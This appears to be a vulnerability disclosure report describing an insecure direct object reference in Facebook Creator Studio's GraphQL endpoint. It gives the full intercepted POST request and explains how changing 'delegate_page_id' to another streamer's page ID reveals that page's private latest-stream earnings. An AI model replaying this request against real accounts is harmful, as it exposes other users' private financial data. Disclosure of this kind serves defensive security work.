From attacker account
==================
1- Go to https://business.facebook.com/creatorstudio/home ==> Creative tools ===> Live dashboard
2- Go to Latest stream box option ==> Intercept with bupsuite ==> click on "View Stream Report"

you should see POST request like below:

POST /api/graphql/ HTTP/1.1
Host: business.facebook.com

av=attacker_page_id&__user=attacker_user_id&__a=1&__dyn=xxx&__csr=&__req=1l&__beoa=0&__pc=PHASED%3Amedia_manager_pkg&dpr=1&__ccg=EXCELLENT&__rev=1003338073&__s=1go6yt%3A1dmt22%3Amrohob&__hsi=6931897176295571644-0&__comet_req=0&fb_dtsg=xxxxxx&jazoest=22015&__jssesw=1&fb_api_caller_class=RelayModern&fb_api_req_friendly_name=GamesVideoStreamerDashboardProfilePlusVideoQuery&variables={"delegate_page_id":"attacker_page_ID"}&server_timestamps=true&doc_id=5005787666128910

The vulnerable parameter is "delegate_page_id", change the value of it to any streamer page, and forward the request to the server.

you will get a lot of information about the streamer page and one of them is the below private info:

- "latest_stream_video_asset_earnings":"money amount in number" for example as below:
  "latest_stream_video_asset_earnings":"500.00"

which disclose the money amount of his latest stream video.


The above info, consider as private and should not be visible by anyone except the page admins.